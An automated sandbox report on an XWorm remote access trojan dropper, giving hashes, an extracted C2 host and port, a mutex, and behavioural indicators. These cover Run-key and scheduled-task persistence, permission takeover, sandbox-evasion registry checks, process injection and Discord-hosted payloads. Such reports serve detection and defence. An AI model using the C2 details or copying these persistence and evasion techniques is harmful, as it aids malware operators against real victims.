xworm | 018c780a107fe4c716e1f20814f821bee4571f2059b8efed53fafe31cea3d671

Analysis

max time kernel
44s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 09:25

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Dropper.exe
Size

130KB
MD5

f5506ffbf34168afb8dc1d12d08a38fc
SHA1

4062954622406a6e29c52d31dea192c79f7fe7bf
SHA256

018c780a107fe4c716e1f20814f821bee4571f2059b8efed53fafe31cea3d671
SHA512

e455aa92a43b0946945ee22d93b50ed9dcd7dc0c2f0e02132d4bcb1c0b67c90a132c7372f293c2292a925564cbc44050fa4830934aeb4422147905a2462716ed
SSDEEP

1536:K1KTRyrsnRpBgO7JL+97UCnDCZI31QocZaROflkfe970KqwGzlbP3BEA89wtHc:K1U4whj67KqH5bP8B

Score

10^/10

xworm discovery exploit persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

san-periods.gl.at.ply.gg:45994

Mutex

1BUzRXFjTnB3BgEr

Attributes

Install_directory
%AppData%
install_file
svvhost.exe

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\calc.exe	family_xworm
behavioral2/memory/3904-33-0x0000000000EA0000-0x0000000000EB0000-memory.dmp	family_xworm
behavioral2/memory/3380-1060-0x00000000008D0000-0x00000000008E0000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1388 created 612 1388 powershell.EXE winlogon.exe
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Downloads MZ/PE file

description	pid	process	target process
PID 1388 created 612	1388	powershell.EXE	winlogon.exe

Possible privilege escalation attempt 14 IoCs

exploit

Processes:

icacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exe

pid	process
2324	icacls.exe
5840	takeown.exe
6404	takeown.exe
6452	takeown.exe
6036	icacls.exe
7136	takeown.exe
6348	icacls.exe
6200	takeown.exe
5368	takeown.exe
5796	takeown.exe
6748	takeown.exe
1628	takeown.exe
6204	takeown.exe
6948	icacls.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Dropper.exeyar.exepenisware.execalc.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Dropper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	yar.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	penisware.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	calc.exe

Executes dropped EXE 7 IoCs

Processes:

yar.exesachost.exepenisware.exepenisballs.exephysics.execalc.exeinstall.exe

pid process

1836 yar.exe
4308 sachost.exe
1924 penisware.exe
2676 penisballs.exe
3172 physics.exe
3904 calc.exe
2468 install.exe

pid	process
1836	yar.exe
4308	sachost.exe
1924	penisware.exe
2676	penisballs.exe
3172	physics.exe
3904	calc.exe
2468	install.exe

Modifies file permissions 1 TTPs 14 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exe

pid	process
6748	takeown.exe
2324	icacls.exe
5368	takeown.exe
5840	takeown.exe
7136	takeown.exe
1628	takeown.exe
6036	icacls.exe
6348	icacls.exe
6204	takeown.exe
6404	takeown.exe
6452	takeown.exe
5796	takeown.exe
6948	icacls.exe
6200	takeown.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

yar.exepenisware.execalc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yar = "C:\\Users\\Admin\\AppData\\Roaming\\yar.exe"	yar.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\penisware = "C:\\Users\\Admin\\AppData\\Local\\penisware.exe"	penisware.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svvhost = "C:\\Users\\Admin\\AppData\\Roaming\\svvhost.exe"	calc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 discord.com
2 discord.com
36 discord.com

flow	ioc
1	discord.com
2	discord.com
36	discord.com

Drops file in System32 directory 7 IoCs

Processes:

svchost.exepowershell.EXEsvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\penisware	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\svvhost	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 1388 set thread context of 2688 1388 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

6180 5504 WerFault.exe cmd.exe
6428 5648 WerFault.exe cmd.exe
4612 5648 WerFault.exe cmd.exe

description	pid	process	target process
PID 1388 set thread context of 2688	1388	powershell.EXE	dllhost.exe

pid	pid_target	process	target process
6180	5504	WerFault.exe	cmd.exe
6428	5648	WerFault.exe	cmd.exe
4612	5648	WerFault.exe	cmd.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4616 schtasks.exe
2032 schtasks.exe
2292 schtasks.exe
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

wmiprvse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe

pid	process
4616	schtasks.exe
2032	schtasks.exe
2292	schtasks.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE

Modifies registry class 4 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sachost.exepenisballs.exepowershell.EXEphysics.exedllhost.exe

pid	process
4308	sachost.exe
4308	sachost.exe
2676	penisballs.exe
2676	penisballs.exe
1388	powershell.EXE
3172	physics.exe
3172	physics.exe
1388	powershell.EXE
1388	powershell.EXE
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe
2688	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

yar.exesachost.exepenisware.exepenisballs.exephysics.execalc.exepowershell.EXEdllhost.exeExplorer.EXEsvchost.exe

description	pid	process
Token: SeDebugPrivilege	1836	yar.exe
Token: SeDebugPrivilege	4308	sachost.exe
Token: SeDebugPrivilege	1924	penisware.exe
Token: SeDebugPrivilege	2676	penisballs.exe
Token: SeDebugPrivilege	3172	physics.exe
Token: SeDebugPrivilege	3904	calc.exe
Token: SeDebugPrivilege	1388	powershell.EXE
Token: SeDebugPrivilege	1836	yar.exe
Token: SeDebugPrivilege	1388	powershell.EXE
Token: SeDebugPrivilege	2688	dllhost.exe
Token: SeDebugPrivilege	1924	penisware.exe
Token: SeShutdownPrivilege	3500	Explorer.EXE
Token: SeCreatePagefilePrivilege	3500	Explorer.EXE
Token: SeDebugPrivilege	3904	calc.exe
Token: SeAssignPrimaryTokenPrivilege	1796	svchost.exe
Token: SeIncreaseQuotaPrivilege	1796	svchost.exe
Token: SeSecurityPrivilege	1796	svchost.exe
Token: SeTakeOwnershipPrivilege	1796	svchost.exe
Token: SeLoadDriverPrivilege	1796	svchost.exe
Token: SeSystemtimePrivilege	1796	svchost.exe
Token: SeBackupPrivilege	1796	svchost.exe
Token: SeRestorePrivilege	1796	svchost.exe
Token: SeShutdownPrivilege	1796	svchost.exe
Token: SeSystemEnvironmentPrivilege	1796	svchost.exe
Token: SeUndockPrivilege	1796	svchost.exe
Token: SeManageVolumePrivilege	1796	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1796	svchost.exe
Token: SeIncreaseQuotaPrivilege	1796	svchost.exe
Token: SeSecurityPrivilege	1796	svchost.exe
Token: SeTakeOwnershipPrivilege	1796	svchost.exe
Token: SeLoadDriverPrivilege	1796	svchost.exe
Token: SeSystemtimePrivilege	1796	svchost.exe
Token: SeBackupPrivilege	1796	svchost.exe
Token: SeRestorePrivilege	1796	svchost.exe
Token: SeShutdownPrivilege	1796	svchost.exe
Token: SeSystemEnvironmentPrivilege	1796	svchost.exe
Token: SeUndockPrivilege	1796	svchost.exe
Token: SeManageVolumePrivilege	1796	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1796	svchost.exe
Token: SeIncreaseQuotaPrivilege	1796	svchost.exe
Token: SeSecurityPrivilege	1796	svchost.exe
Token: SeTakeOwnershipPrivilege	1796	svchost.exe
Token: SeLoadDriverPrivilege	1796	svchost.exe
Token: SeSystemtimePrivilege	1796	svchost.exe
Token: SeBackupPrivilege	1796	svchost.exe
Token: SeRestorePrivilege	1796	svchost.exe
Token: SeShutdownPrivilege	1796	svchost.exe
Token: SeSystemEnvironmentPrivilege	1796	svchost.exe
Token: SeUndockPrivilege	1796	svchost.exe
Token: SeManageVolumePrivilege	1796	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1796	svchost.exe
Token: SeIncreaseQuotaPrivilege	1796	svchost.exe
Token: SeSecurityPrivilege	1796	svchost.exe
Token: SeTakeOwnershipPrivilege	1796	svchost.exe
Token: SeLoadDriverPrivilege	1796	svchost.exe
Token: SeSystemtimePrivilege	1796	svchost.exe
Token: SeBackupPrivilege	1796	svchost.exe
Token: SeRestorePrivilege	1796	svchost.exe
Token: SeShutdownPrivilege	1796	svchost.exe
Token: SeSystemEnvironmentPrivilege	1796	svchost.exe
Token: SeUndockPrivilege	1796	svchost.exe
Token: SeManageVolumePrivilege	1796	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1796	svchost.exe
Token: SeIncreaseQuotaPrivilege	1796	svchost.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

sachost.exepenisballs.exephysics.exe

pid process

4308 sachost.exe
2676 penisballs.exe
3172 physics.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Dropper.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1488 wrote to memory of 1968	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 1968	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 1968	1488	Dropper.exe	cmd.exe
PID 1968 wrote to memory of 2356	1968	cmd.exe	curl.exe
PID 1968 wrote to memory of 2356	1968	cmd.exe	curl.exe
PID 1968 wrote to memory of 2356	1968	cmd.exe	curl.exe
PID 1488 wrote to memory of 4032	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4032	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4032	1488	Dropper.exe	cmd.exe
PID 4032 wrote to memory of 4312	4032	cmd.exe	curl.exe
PID 4032 wrote to memory of 4312	4032	cmd.exe	curl.exe
PID 4032 wrote to memory of 4312	4032	cmd.exe	curl.exe
PID 1488 wrote to memory of 1836	1488	Dropper.exe	yar.exe
PID 1488 wrote to memory of 1836	1488	Dropper.exe	yar.exe
PID 1488 wrote to memory of 3716	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 3716	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 3716	1488	Dropper.exe	cmd.exe
PID 3716 wrote to memory of 916	3716	cmd.exe	curl.exe
PID 3716 wrote to memory of 916	3716	cmd.exe	curl.exe
PID 3716 wrote to memory of 916	3716	cmd.exe	curl.exe
PID 1488 wrote to memory of 4308	1488	Dropper.exe	sachost.exe
PID 1488 wrote to memory of 4308	1488	Dropper.exe	sachost.exe
PID 1488 wrote to memory of 1068	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 1068	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 1068	1488	Dropper.exe	cmd.exe
PID 1068 wrote to memory of 404	1068	cmd.exe	curl.exe
PID 1068 wrote to memory of 404	1068	cmd.exe	curl.exe
PID 1068 wrote to memory of 404	1068	cmd.exe	curl.exe
PID 1488 wrote to memory of 1924	1488	Dropper.exe	penisware.exe
PID 1488 wrote to memory of 1924	1488	Dropper.exe	penisware.exe
PID 1488 wrote to memory of 4484	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4484	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4484	1488	Dropper.exe	cmd.exe
PID 4484 wrote to memory of 2660	4484	cmd.exe	curl.exe
PID 4484 wrote to memory of 2660	4484	cmd.exe	curl.exe
PID 4484 wrote to memory of 2660	4484	cmd.exe	curl.exe
PID 1488 wrote to memory of 2676	1488	Dropper.exe	penisballs.exe
PID 1488 wrote to memory of 2676	1488	Dropper.exe	penisballs.exe
PID 1488 wrote to memory of 4268	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4268	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4268	1488	Dropper.exe	cmd.exe
PID 4268 wrote to memory of 4412	4268	cmd.exe	curl.exe
PID 4268 wrote to memory of 4412	4268	cmd.exe	curl.exe
PID 4268 wrote to memory of 4412	4268	cmd.exe	curl.exe
PID 1488 wrote to memory of 3172	1488	Dropper.exe	physics.exe
PID 1488 wrote to memory of 3172	1488	Dropper.exe	physics.exe
PID 1488 wrote to memory of 5004	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 5004	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 5004	1488	Dropper.exe	cmd.exe
PID 5004 wrote to memory of 4960	5004	cmd.exe	curl.exe
PID 5004 wrote to memory of 4960	5004	cmd.exe	curl.exe
PID 5004 wrote to memory of 4960	5004	cmd.exe	curl.exe
PID 1488 wrote to memory of 3904	1488	Dropper.exe	calc.exe
PID 1488 wrote to memory of 3904	1488	Dropper.exe	calc.exe
PID 1488 wrote to memory of 4732	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4732	1488	Dropper.exe	cmd.exe
PID 1488 wrote to memory of 4732	1488	Dropper.exe	cmd.exe
PID 4732 wrote to memory of 1864	4732	cmd.exe	curl.exe
PID 4732 wrote to memory of 1864	4732	cmd.exe	curl.exe
PID 4732 wrote to memory of 1864	4732	cmd.exe	curl.exe
PID 1488 wrote to memory of 2468	1488	Dropper.exe	install.exe
PID 1488 wrote to memory of 2468	1488	Dropper.exe	install.exe
PID 1488 wrote to memory of 2468	1488	Dropper.exe	install.exe
PID 1488 wrote to memory of 2140	1488	Dropper.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:316

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{bff580aa-3467-473b-9d6b-43bd9caefb64}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:868

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1132

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
